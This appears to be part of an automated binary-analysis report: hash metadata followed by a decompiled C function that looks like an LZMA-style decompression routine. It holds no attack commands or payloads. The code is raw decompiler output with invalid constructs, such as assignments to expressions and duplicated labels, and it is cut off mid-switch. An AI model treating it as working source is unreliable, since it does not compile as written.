                                                                                  • API String ID:
                                                                                  • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                  • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                  • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                  • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 98%
                                                                                  			E00407068() {
                                                                                  				unsigned short _t531;
                                                                                  				signed int _t532;
                                                                                  				void _t533;
                                                                                  				signed int _t534;
                                                                                  				signed int _t535;
                                                                                  				signed int _t565;
                                                                                  				signed int _t568;
                                                                                  				signed int _t589;
                                                                                  				signed int* _t606;
                                                                                  				void* _t613;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					if( *(_t613 - 0x40) != 0) {
                                                                                  						 *(_t613 - 0x84) = 0xa;
                                                                                  						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                  					} else {
                                                                                  						 *(__ebp - 0x84) = 9;
                                                                                  						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                  					}
                                                                                  					while(1) {
                                                                                  						 *(_t613 - 0x54) = _t606;
                                                                                  						while(1) {
                                                                                  							L133:
                                                                                  							_t531 =  *_t606;
                                                                                  							_t589 = _t531 & 0x0000ffff;
                                                                                  							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                  							if( *(_t613 - 0xc) >= _t565) {
                                                                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                  								 *(_t613 - 0x40) = 1;
                                                                                  								_t532 = _t531 - (_t531 >> 5);
                                                                                  								 *_t606 = _t532;
                                                                                  							} else {
                                                                                  								 *(_t613 - 0x10) = _t565;
                                                                                  								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                  								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                  							}
                                                                                  							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                  								goto L139;
                                                                                  							}
                                                                                  							L137:
                                                                                  							if( *(_t613 - 0x6c) == 0) {
                                                                                  								 *(_t613 - 0x88) = 5;
                                                                                  								L170:
                                                                                  								_t568 = 0x22;
                                                                                  								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                  								_t535 = 0;
                                                                                  								L172:
                                                                                  								return _t535;
                                                                                  							}
                                                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                  							L139:
                                                                                  							_t533 =  *(_t613 - 0x84);
                                                                                  							while(1) {
                                                                                  								 *(_t613 - 0x88) = _t533;
                                                                                  								while(1) {
                                                                                  									L1:
                                                                                  									_t534 =  *(_t613 - 0x88);
                                                                                  									if(_t534 > 0x1c) {
                                                                                  										break;
                                                                                  									}
                                                                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                  										case 0:
                                                                                  											if( *(_t613 - 0x6c) == 0) {
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                  											_t534 =  *( *(_t613 - 0x70));
                                                                                  											if(_t534 > 0xe1) {
                                                                                  												goto L171;
                                                                                  											}
                                                                                  											_t538 = _t534 & 0x000000ff;
                                                                                  											_push(0x2d);
                                                                                  											asm("cdq");
                                                                                  											_pop(_t570);
                                                                                  											_push(9);
                                                                                  											_pop(_t571);
                                                                                  											_t609 = _t538 / _t570;
                                                                                  											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                  											asm("cdq");
                                                                                  											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                  											 *(_t613 - 0x3c) = _t604;
                                                                                  											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                  											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                  											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                  											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                  												L10:
                                                                                  												if(_t612 == 0) {
                                                                                  													L12:
                                                                                  													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                  													goto L15;
                                                                                  												} else {
                                                                                  													goto L11;
                                                                                  												}
                                                                                  												do {
                                                                                  													L11:
                                                                                  													_t612 = _t612 - 1;
                                                                                  													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                  												} while (_t612 != 0);
                                                                                  												goto L12;
                                                                                  											}
                                                                                  											if( *(_t613 - 4) != 0) {
                                                                                  												GlobalFree( *(_t613 - 4));
                                                                                  											}
                                                                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                  											 *(_t613 - 4) = _t534;
                                                                                  											if(_t534 == 0) {
                                                                                  												goto L171;
                                                                                  											} else {
                                                                                  												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                  												goto L10;
                                                                                  											}
                                                                                  										case 1:
                                                                                  											L13:
                                                                                  											__eflags =  *(_t613 - 0x6c);
                                                                                  											if( *(_t613 - 0x6c) == 0) {
                                                                                  												 *(_t613 - 0x88) = 1;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                  											_t45 = _t613 - 0x48;
                                                                                  											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                  											__eflags =  *_t45;
                                                                                  											L15:
                                                                                  											if( *(_t613 - 0x48) < 4) {
                                                                                  												goto L13;
                                                                                  											}
                                                                                  											_t546 =  *(_t613 - 0x40);
                                                                                  											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                  												L20:
                                                                                  												 *(_t613 - 0x48) = 5;
                                                                                  												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                  												goto L23;
                                                                                  											}
                                                                                  											 *(_t613 - 0x74) = _t546;
                                                                                  											if( *(_t613 - 8) != 0) {
                                                                                  												GlobalFree( *(_t613 - 8));
                                                                                  											}
                                                                                  											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                  											 *(_t613 - 8) = _t534;
                                                                                  											if(_t534 == 0) {
                                                                                  												goto L171;
                                                                                  											} else {
                                                                                  												goto L20;
                                                                                  											}
                                                                                  										case 2:
                                                                                  											L24:
                                                                                  											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                  											 *(_t613 - 0x84) = 6;
                                                                                  											 *(_t613 - 0x4c) = _t553;
                                                                                  											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                  											 *(_t613 - 0x54) = _t606;
                                                                                  											goto L133;
                                                                                  										case 3:
                                                                                  											L21:
                                                                                  											__eflags =  *(_t613 - 0x6c);
                                                                                  											if( *(_t613 - 0x6c) == 0) {
                                                                                  												 *(_t613 - 0x88) = 3;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  											_t67 = _t613 - 0x70;
                                                                                  											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                  											__eflags =  *_t67;
                                                                                  											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                  											L23:
                                                                                  											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                  											if( *(_t613 - 0x48) != 0) {
                                                                                  												goto L21;
                                                                                  											}
                                                                                  											goto L24;
                                                                                  										case 4:
                                                                                  											L133:
                                                                                  											_t531 =  *_t606;
                                                                                  											_t589 = _t531 & 0x0000ffff;
                                                                                  											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                  											if( *(_t613 - 0xc) >= _t565) {
                                                                                  												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                  												 *(_t613 - 0x40) = 1;
                                                                                  												_t532 = _t531 - (_t531 >> 5);
                                                                                  												 *_t606 = _t532;
                                                                                  											} else {
                                                                                  												 *(_t613 - 0x10) = _t565;
                                                                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                  												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                  											}
                                                                                  											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                  												goto L139;
                                                                                  											}
                                                                                  										case 5:
                                                                                  											goto L137;
                                                                                  										case 6:
                                                                                  											__edx = 0;
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x34) = 1;
                                                                                  												 *(__ebp - 0x84) = 7;
                                                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                  												while(1) {
                                                                                  													 *(_t613 - 0x54) = _t606;
                                                                                  													goto L133;
                                                                                  												}
                                                                                  											}
                                                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                  											__esi =  *(__ebp - 0x60);
                                                                                  											__cl = 8;
                                                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                  											__ecx =  *(__ebp - 0x3c);
                                                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                  											__ecx =  *(__ebp - 4);
                                                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  											if( *(__ebp - 0x38) >= 4) {
                                                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                                                  													_t98 = __ebp - 0x38;
                                                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                  													__eflags =  *_t98;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                  												}
                                                                                  											} else {
                                                                                  												 *(__ebp - 0x38) = 0;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                  											if( *(__ebp - 0x34) == __edx) {
                                                                                  												__ebx = 0;
                                                                                  												__ebx = 1;
                                                                                  												goto L61;
                                                                                  											} else {
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                                  													__eflags = __eax;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 8);
                                                                                  												__ebx = 0;
                                                                                  												__ebx = 1;
                                                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                  												goto L41;
                                                                                  											}
                                                                                  										case 7:
                                                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                                                  											if( *(__ebp - 0x40) != 1) {
                                                                                  												__eax =  *(__ebp - 0x24);
                                                                                  												 *(__ebp - 0x80) = 0x16;
                                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  												__eax =  *(__ebp - 0x28);
                                                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  												__eax =  *(__ebp - 0x2c);
                                                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  												__eax = 0;
                                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  												__al = __al & 0x000000fd;
                                                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                                                  												__eflags = __eax;
                                                                                  												 *(__ebp - 0x58) = __eax;
                                                                                  												goto L69;
                                                                                  											}
                                                                                  											__eax =  *(__ebp - 4);
                                                                                  											__ecx =  *(__ebp - 0x38);
                                                                                  											 *(__ebp - 0x84) = 8;
                                                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                  											while(1) {
                                                                                  												 *(_t613 - 0x54) = _t606;
                                                                                  												goto L133;
                                                                                  											}
                                                                                  										case 8:
                                                                                  											goto L0;
                                                                                  										case 9:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												goto L89;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x60);
                                                                                  											if( *(__ebp - 0x60) == 0) {
                                                                                  												goto L171;
                                                                                  											}
                                                                                  											__eax = 0;
                                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                                  											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                  											__eflags = _t258;
                                                                                  											0 | _t258 = _t258 + _t258 + 9;
                                                                                  											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                  											goto L75;
                                                                                  										case 0xa:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x84) = 0xb;
                                                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                  												while(1) {
                                                                                  													 *(_t613 - 0x54) = _t606;
                                                                                  													goto L133;
                                                                                  												}
                                                                                  											}
                                                                                  											__eax =  *(__ebp - 0x28);
                                                                                  											goto L88;
                                                                                  										case 0xb:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												__ecx =  *(__ebp - 0x24);
                                                                                  												__eax =  *(__ebp - 0x20);
                                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  											} else {
                                                                                  												__eax =  *(__ebp - 0x24);
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x28);
                                                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  											L88:
                                                                                  											__ecx =  *(__ebp - 0x2c);
                                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  											L89:
                                                                                  											__eax =  *(__ebp - 4);
                                                                                  											 *(__ebp - 0x80) = 0x15;
                                                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                  											goto L69;
                                                                                  										case 0xc:
                                                                                  											L99:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0xc;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t334 = __ebp - 0x70;
                                                                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t334;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											__eax =  *(__ebp - 0x2c);
                                                                                  											goto L101;
                                                                                  										case 0xd:
                                                                                  											L37:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0xd;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t122 = __ebp - 0x70;
                                                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t122;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											L39:
                                                                                  											__eax =  *(__ebp - 0x40);
                                                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                  												goto L48;
                                                                                  											}
                                                                                  											__eflags = __ebx - 0x100;
                                                                                  											if(__ebx >= 0x100) {
                                                                                  												goto L54;
                                                                                  											}
                                                                                  											L41:
                                                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                  											__ecx =  *(__ebp - 0x58);
                                                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                  											 *(__ebp - 0x48) = __eax;
                                                                                  											__eax = __eax + 1;
                                                                                  											__eax = __eax << 8;
                                                                                  											__eax = __eax + __ebx;
                                                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  											__ax =  *__esi;
                                                                                  											 *(__ebp - 0x54) = __esi;
                                                                                  											__edx = __ax & 0x0000ffff;
                                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  												__cx = __ax;
                                                                                  												 *(__ebp - 0x40) = 1;
                                                                                  												__cx = __ax >> 5;
                                                                                  												__eflags = __eax;
                                                                                  												__ebx = __ebx + __ebx + 1;
                                                                                  												 *__esi = __ax;
                                                                                  											} else {
                                                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                                  												0x800 = 0x800 - __edx;
                                                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                  												__ebx = __ebx + __ebx;
                                                                                  												 *__esi = __cx;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  												goto L39;
                                                                                  											} else {
                                                                                  												goto L37;
                                                                                  											}
                                                                                  										case 0xe:
                                                                                  											L46:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0xe;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t156 = __ebp - 0x70;
                                                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t156;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											while(1) {
                                                                                  												L48:
                                                                                  												__eflags = __ebx - 0x100;
                                                                                  												if(__ebx >= 0x100) {
                                                                                  													break;
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x58);
                                                                                  												__edx = __ebx + __ebx;
                                                                                  												__ecx =  *(__ebp - 0x10);
                                                                                  												__esi = __edx + __eax;
                                                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  												__ax =  *__esi;
                                                                                  												 *(__ebp - 0x54) = __esi;
                                                                                  												__edi = __ax & 0x0000ffff;
                                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  													__cx = __ax;
                                                                                  													_t170 = __edx + 1; // 0x1
                                                                                  													__ebx = _t170;
                                                                                  													__cx = __ax >> 5;
                                                                                  													__eflags = __eax;
                                                                                  													 *__esi = __ax;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                                  													0x800 = 0x800 - __edi;
                                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  													__ebx = __ebx + __ebx;
                                                                                  													 *__esi = __cx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													continue;
                                                                                  												} else {
                                                                                  													goto L46;
                                                                                  												}
                                                                                  											}
                                                                                  											L54:
                                                                                  											_t173 = __ebp - 0x34;
                                                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                  											__eflags =  *_t173;
                                                                                  											goto L55;
                                                                                  										case 0xf:
                                                                                  											L58:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0xf;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t203 = __ebp - 0x70;
                                                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t203;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											L60:
                                                                                  											__eflags = __ebx - 0x100;
                                                                                  											if(__ebx >= 0x100) {
                                                                                  												L55:
                                                                                  												__al =  *(__ebp - 0x44);
                                                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                  												goto L56;
                                                                                  											}
                                                                                  											L61:
                                                                                  											__eax =  *(__ebp - 0x58);
                                                                                  											__edx = __ebx + __ebx;
                                                                                  											__ecx =  *(__ebp - 0x10);
                                                                                  											__esi = __edx + __eax;
                                                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  											__ax =  *__esi;
                                                                                  											 *(__ebp - 0x54) = __esi;
                                                                                  											__edi = __ax & 0x0000ffff;
                                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  												__cx = __ax;
                                                                                  												_t217 = __edx + 1; // 0x1
                                                                                  												__ebx = _t217;
                                                                                  												__cx = __ax >> 5;
                                                                                  												__eflags = __eax;
                                                                                  												 *__esi = __ax;
                                                                                  											} else {
                                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                                  												0x800 = 0x800 - __edi;
                                                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  												__ebx = __ebx + __ebx;
                                                                                  												 *__esi = __cx;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  												goto L60;
                                                                                  											} else {
                                                                                  												goto L58;
                                                                                  											}
                                                                                  										case 0x10:
                                                                                  											L109:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												 *(__ebp - 0x88) = 0x10;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t365 = __ebp - 0x70;
                                                                                  											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t365;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											goto L111;
                                                                                  										case 0x11:
                                                                                  											L69:
                                                                                  											__esi =  *(__ebp - 0x58);
                                                                                  											 *(__ebp - 0x84) = 0x12;
                                                                                  											while(1) {
                                                                                  												 *(_t613 - 0x54) = _t606;
                                                                                  												goto L133;
                                                                                  											}
                                                                                  										case 0x12:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												__eax =  *(__ebp - 0x58);
                                                                                  												 *(__ebp - 0x84) = 0x13;
                                                                                  												__esi =  *(__ebp - 0x58) + 2;
                                                                                  												while(1) {
                                                                                  													 *(_t613 - 0x54) = _t606;
                                                                                  													goto L133;
                                                                                  												}
                                                                                  											}
